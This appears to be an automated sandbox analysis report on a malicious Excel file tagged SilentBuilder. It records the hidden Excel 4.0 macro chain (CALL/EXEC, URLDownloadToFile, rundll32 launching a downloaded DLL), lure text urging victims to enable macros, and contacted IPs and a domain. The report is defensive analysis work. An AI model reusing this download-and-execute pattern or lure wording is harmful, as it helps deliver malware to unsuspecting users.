Loading ...

Play interactive tourEdit tour

Analysis Report afdab907_by_Libranalysis.xls

Overview

General Information

Sample Name:afdab907_by_Libranalysis.xls
Analysis ID:412299
MD5:afdab90737c55a669e7025df2fa86efe
SHA1:39a056a263368dcb1fb98a2226eae7c9d1488453
SHA256:d61e90fe268528db7a0eee66f064270a519b2843a59642923b137ec2b81fe5e2
Tags:SilentBuilder
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 4440 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 5080 cmdline: rundll32 ..\ritofm.cvm,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4876 cmdline: rundll32 ..\ritofm.cvm1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 4440, ProcessCommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, ProcessId: 5080

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.5:49713 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
Source: global trafficDNS query: name: signifysystem.com
Source: global trafficTCP traffic: 192.168.2.5:49711 -> 192.185.39.58:443
Source: global trafficTCP traffic: 192.168.2.5:49711 -> 192.185.39.58:443
Source: Joe Sandbox ViewIP Address: 192.185.39.58 192.185.39.58
Source: Joe Sandbox ViewIP Address: 192.185.32.232 192.185.32.232
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS traffic detected: queries for: signifysystem.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://api.aadrm.com/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://api.cortana.ai
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://api.office.net
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://api.onedrive.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://augloop.office.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://cdn.entity.
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://clients.config.office.net/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://config.edge.skype.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://cortana.ai
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://cortana.ai/api
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://cr.office.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://dev.cortana.ai
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://devnull.onenote.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://directory.services.
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://graph.windows.net
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://graph.windows.net/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://lifecycle.office.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://login.windows.local
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://management.azure.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://management.azure.com/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://messaging.office.com/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://ncus.contentsync.
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://officeapps.live.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://onedrive.live.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://outlook.office.com/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://outlook.office365.com/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://settings.outlook.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://staging.cortana.ai
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://tasks.office.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://wus2.contentsync.
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 05A0640A-6863-4E3B-ACA9-DB328E6298FA.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.5:49713 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 12Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Screenshot number: 12Screenshot OCR: Enable Content from the yellow bar above O ' WHY I CANNOT OPEN THIS DOCUMENT ? W You are using
Source: Document image extraction number: 5Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 5Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or An
Source: Document image extraction number: 14Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Document image extraction number: 14Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? w You are using IDS or
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: afdab907_by_Libranalysis.xlsInitial sample: CALL
Source: afdab907_by_Libranalysis.xlsInitial sample: CALL
Source: afdab907_by_Libranalysis.xlsInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: afdab907_by_Libranalysis.xlsInitial sample: Sheet size: 14902
Source: afdab907_by_Libranalysis.xlsOLE indicator, VBA macros: true
Source: classification engineClassification label: mal68.expl.evad.winXLS@5/7@2/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{D5138DE4-2FFA-4EB4-815F-03E898231296} - OProcSessId.datJump to behavior
Source: afdab907_by_Libranalysis.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
